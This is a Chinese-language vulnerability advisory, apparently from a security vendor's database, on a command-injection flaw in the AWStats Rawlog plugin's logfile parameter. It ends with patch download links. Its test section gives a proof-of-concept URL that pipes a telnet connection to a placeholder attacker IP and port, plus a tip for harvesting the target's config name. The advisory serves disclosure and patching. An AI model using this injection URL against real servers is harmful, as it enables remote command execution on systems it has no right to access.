安全研究
安全漏洞
AWStats Rawlog插件logfile参数输入验证漏洞
发布日期:2004-08-16
更新日期:2004-08-16
受影响系统:
AWStats AWStats <= 6.3不受影响系统:
AWStats AWStats 6.5.0 build 1.857描述:
BUGTRAQ ID: 10950
AWStats是一款极为流行的基于Web的网站访问统计程序。
AWStats 6.1版本Rawlog插件存在输入验证漏洞,攻击者可利用此漏洞执行远程命令或泄漏Web服务器内容。该漏洞源于没有有效过滤用户传递到awstats.pl的logfile URI数据。
<*来源:K-sPecial.
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://www.example.com/awstats.pl?filterrawlog=&rawlog_maxlines=5000&config=www.example.com&framename=main&pluginmode=rawlog&logfile=&logfile=|telnet <your ip> <port>
Where the '&config' parameter value is the configuration file for www.example.com. It is reported that the configuration filename can be harvested from the HTML source of the awstats page for the target site.
建议:
厂商补丁:
AWStats
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
AWStats AWStats 5.0
AWStats awstats-6.4.tgz
http://awstats.sourceforge.net/files/awstats-6.4.tgz
AWStats AWStats 5.1
AWStats awstats-6.4.tgz
http://awstats.sourceforge.net/files/awstats-6.4.tgz
AWStats AWStats 5.2
AWStats awstats-6.4.tgz
http://awstats.sourceforge.net/files/awstats-6.4.tgz
AWStats AWStats 5.3
AWStats awstats-6.4.tgz
http://awstats.sourceforge.net/files/awstats-6.4.tgz
AWStats AWStats 5.4
AWStats awstats-6.4.tgz
http://awstats.sourceforge.net/files/awstats-6.4.tgz
AWStats AWStats 5.5
AWStats awstats-6.4.tgz
http://awstats.sourceforge.net/files/awstats-6.4.tgz
AWStats AWStats 5.6
AWStats awstats-6.4.tgz
http://awstats.sourceforge.net/files/awstats-6.4.tgz
AWStats AWStats 5.7
AWStats awstats-6.4.tgz
http://awstats.sourceforge.net/files/awstats-6.4.tgz
AWStats AWStats 5.8
AWStats awstats-6.4.tgz
http://awstats.sourceforge.net/files/awstats-6.4.tgz
AWStats AWStats 5.9
AWStats awstats-6.4.tgz
http://awstats.sourceforge.net/files/awstats-6.4.tgz
AWStats AWStats 6.0
AWStats awstats-6.4.tgz
http://awstats.sourceforge.net/files/awstats-6.4.tgz
AWStats AWStats 6.1
AWStats awstats-6.4.tgz
http://awstats.sourceforge.net/files/awstats-6.4.tgz
AWStats AWStats 6.2
AWStats awstats-6.4.tgz
http://awstats.sourceforge.net/files/awstats-6.4.tgz
AWStats AWStats 6.3
AWStats awstats-6.4.tgz
http://awstats.sourceforge.net/files/awstats-6.4.tgz
浏览次数:1663
严重程度:0(网友投票)
绿盟科技给您安全的保障